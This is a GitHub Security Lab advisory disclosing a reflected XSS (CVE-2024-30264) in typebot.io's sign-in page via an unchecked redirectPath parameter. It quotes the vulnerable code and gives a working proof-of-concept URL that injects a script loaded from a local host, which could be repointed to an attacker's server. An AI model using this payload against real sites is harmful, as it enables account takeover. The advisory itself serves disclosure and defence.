GHSL-2024-040: Cross-Site Scripting (XSS) in the sign-in page of typebot.io - CVE-2024-30264

Coordinated Disclosure Timeline

• 2024-03-22: Vulnerability Submitted via Private Vulnerability Reporting
• 2024-03-25: Vulnerability Patched
• 2024-04-02: CVE-2024-30264 assigned

Summary

A reflected cross-site scripting (XSS) in the sign-in page of typebot.io may allow an attacker to hijack a user’s account.

Project

typebot.io

Tested Version

v2.23.0

Details

Reflected XSS in SignInForm.tsx (GHSL-2024-040)

The sign-in page takes the redirectPath parameter from the URL. If a user clicks on a link where the redirectPath parameter has a javascript scheme, the attacker that crafted the link may be able to execute arbitrary JavaScript with the privileges of the user.

export const SignInForm = ({
  defaultEmail,
}: Props & HTMLChakraProps<'form'>) => {
  const { t } = useTranslate()
  const router = useRouter()
  const { status } = useSession()
  const [authLoading, setAuthLoading] = useState(false)
  const [isLoadingProviders, setIsLoadingProviders] = useState(true)

  const [emailValue, setEmailValue] = useState(defaultEmail ?? '')
  const [isMagicLinkSent, setIsMagicLinkSent] = useState(false)

  const { showToast } = useToast()
  const [providers, setProviders] =
    useState<
      Record<LiteralUnion<BuiltInProviderType, string>, ClientSafeProvider>
    >()

  const hasNoAuthProvider =
    !isLoadingProviders && Object.keys(providers ?? {}).length === 0

  useEffect(() => {
    if (status === 'authenticated') {
      router.replace(router.query.redirectPath?.toString() ?? '/typebots')        <------ url redirected to query parameter
      return
    }

This vulnerability was found with the help of CodeQL’s Reflected XSS Query

Impact

This issue may lead to Account Takeover.

Proof of Concept

The following link will grab a javascript file from localhost and execute it in the context of the current domain. An attacker can use this payload to grab javascript from his host and execute in the domain of the victim.

https://app.typebot.io/signin?redirectPath=javascript:var%20script%20=%20document.createElement(%27script%27);script.src%20=%20%27http://127.0.0.1:8765/alert.js%27;%20document.head.appendChild(script);#//

CVE

• CVE-2024-30264

Resources

• https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-mx2f-9mcr-8j73

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-040 in any communication regarding this issue.